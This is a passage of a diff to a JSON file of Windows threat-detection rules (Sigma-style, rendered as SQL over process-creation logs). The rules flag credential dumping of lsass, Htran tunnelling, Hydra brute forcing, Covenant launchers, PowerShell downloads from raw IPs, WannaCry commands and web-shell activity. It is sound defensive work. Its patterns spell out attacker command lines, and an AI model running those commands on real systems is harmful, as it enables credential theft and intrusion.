"ca621ba5-54ab-4035-9942-d378e6fcde3c", + "title": "HackTool - Htran/NATBypass Execution", + "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", - "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "status": "test", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "title": "Suspicious CMD Shell Output Redirect", + "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "description": "Detects inline windows shell commands redirecting output via 
the \">\" symbol to a suspicious location", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1218" + ], + "falsepositives": [ + "Legitimate admin scripts" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" + }, + { + "title": "CL_LoadAssembly.ps1 Proxy Execution", + "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", + "status": "experimental", + "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 
'Security' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" + "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" }, { - "title": "Suspicious X509Enrollment - Process Creation", - "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", + "title": "DumpMinitool Execution", + "id": "dee0a7a3-f200-4112-a99b-952196d81e42", "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", + "description": "Detects the use of \"DumpMinitool.exe\" a tool that allows the dump of process memory via the use of the \"MiniDumpWriteDump\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND (CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_x509enrollment.yml" + "filename": "proc_creation_win_dumpminitool_execution.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "title": "Command Line Execution with Suspicious URL and 
AppData Strings", + "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", + "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.defense_evasion", + "attack.command_and_control", + "attack.t1059.003", "attack.t1059.001", - "attack.t1564.003" + "attack.t1105" + ], + "falsepositives": [ + "High" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_cmd_http_appdata.yml" + }, + { + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", + "tags": [ + "attack.credential_access", + "attack.t1110", + "attack.t1110.001" + ], + "falsepositives": [ + "Software that uses the caret encased keywords PASS and USER in its command line" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR 
CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "status": "experimental", - "description": "Detects a Windows program executable started from a suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Exotic software" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": 
"proc_creation_win_susp_service_creation.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", - "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "title": "Suspicious Invoke-WebRequest Execution With DirectIP", + "id": "1edff897-9146-48d2-9066-52e8d8f80a2f", + "status": "experimental", + "description": "Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine 
LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_direct_ip.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", "attack.defense_evasion", - "attack.t1562.004" + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_malware_wannacry.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. 
This is often used after a privilege escalation attempt.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", - "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Download Arbitrary Files Via PresentationHost.exe", + "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "status": "experimental", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP 
'\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_lolbin_presentationhost_download.yml" }, { - "title": "Renamed AutoHotkey.EXE Execution", - "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", "status": "test", - "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", - "author": "Nasreddine Bencherchali", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1505.003", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Particular web applications may spawn a shell process legitimately" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' 
ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((NewProcessName LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' 